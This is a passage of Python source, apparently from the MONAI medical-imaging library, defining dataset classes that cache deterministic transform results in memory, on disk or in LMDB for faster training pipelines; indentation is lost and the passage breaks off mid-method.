'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
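    A minimal usage sketch (the data values and the lambda transform are illustrative placeholders)::
        ds = Dataset(data=[{"img": 1}, {"img": 2}, {"img": 3}],
                     transform=lambda x: {"img": x["img"] + 1})
        print(ds[0])         # {'img': 2}
        print(len(ds[0:2]))  # 2, a torch.utils.data.Subset of the dataset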
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
    Persistent storage of pre-computed values to efficiently manage larger-than-memory dictionary-format data;
    transforms can be applied to specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
    the `cache_dir` before applying the remaining random dependent transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
    followed by applying the random dependent parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
        The input data must be a list of file paths, and they will be hashed as cache keys.
        When loading persistent cache content, there is no guarantee that the cached data matches the
        current transform chain, so please make sure to use exactly the same non-random transforms and
        arguments as were used to build the cache; otherwise, it may cause unexpected errors.
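    A minimal construction sketch (file names, the transform chain and the cache directory are illustrative)::
        ds = PersistentDataset(
            data=[{"image": "image1.nii.gz", "label": "label1.nii.gz"}],
            transform=transforms,          # e.g. the Compose shown above
            cache_dir="./persistent_cache",
        )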
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects input data to be a list of serializable objects
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
            cache is ONLY dependent on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
    Extension of `PersistentDataset`; it can also cache the result of the first N transforms, whether or not they are random.
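    A minimal construction sketch (``train_files``, ``transforms`` and the cache directory are illustrative placeholders)::
        ds = CacheNTransDataset(data=train_files, transform=transforms,
                                cache_n_trans=3, cache_dir="./cache_n_trans")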
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects input data to be a list of serializable objects
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
        Process the data from its original state up to the Nth transform.
Args:
item_transformed: The data to be transformed
Returns:
            the element transformed by the first N transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `LMDBDataset` expects input data to be a list of serializable objects
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
        Check the LMDB cache and write the cache if needed. py-lmdb doesn't have good support for concurrent writes.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
        If the item is not found in the LMDB file, fall back to the persistent cache's default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
    So to improve caching efficiency, always put as many non-random transforms as possible
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
    and its outcome is not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
        during training. It may take a long time to prepare cache content depending on the size of the expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
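    A minimal construction sketch, reusing the `transforms` chain above (``train_files`` is an
    illustrative list of data dictionaries)::
        cache_ds = CacheDataset(data=train_files, transform=transforms,
                                cache_rate=1.0, num_workers=4)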
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
                default to `True`. If the random transforms don't modify the cached content
                (for example, randomly crop from the cached image and deepcopy the crop region),
                or if every cache item is only used once in a `multi-processing` environment,
                you may set `copy_cache=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
        epoch 4: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
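    A minimal sketch of these steps (``train_files``, ``transforms`` and the training loop body are
    illustrative placeholders)::
        dataset = SmartCacheDataset(data=train_files, transform=transforms,
                                    replace_rate=0.25, cache_num=16)
        dataset.start()                  # step 2: launch the replacement thread
        for epoch in range(num_epochs):
            train_one_epoch(dataset)     # placeholder for the actual training loop
            dataset.update_cache()       # step 3: swap in replacement items for the next epoch
        dataset.shutdown()               # step 4: stop the background thread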
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
        shuffle: whether to shuffle the whole data list before preparing the cache content for the first epoch.
            It will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
            default to `True`. If the random transforms don't modify the cache content
            or every cache item is only used once in a `multi-processing` environment,
            you may set `copy_cache=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
        # wait until the replacement manager finishes the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
    Zip several PyTorch datasets and output data (with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
    If the datasets don't have the same length, the minimum of their lengths is used as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
    If training is based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
    If training is based on images and their metadata, the array transforms cannot be composed
    because several transforms receive multiple parameters or return multiple values. Then users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
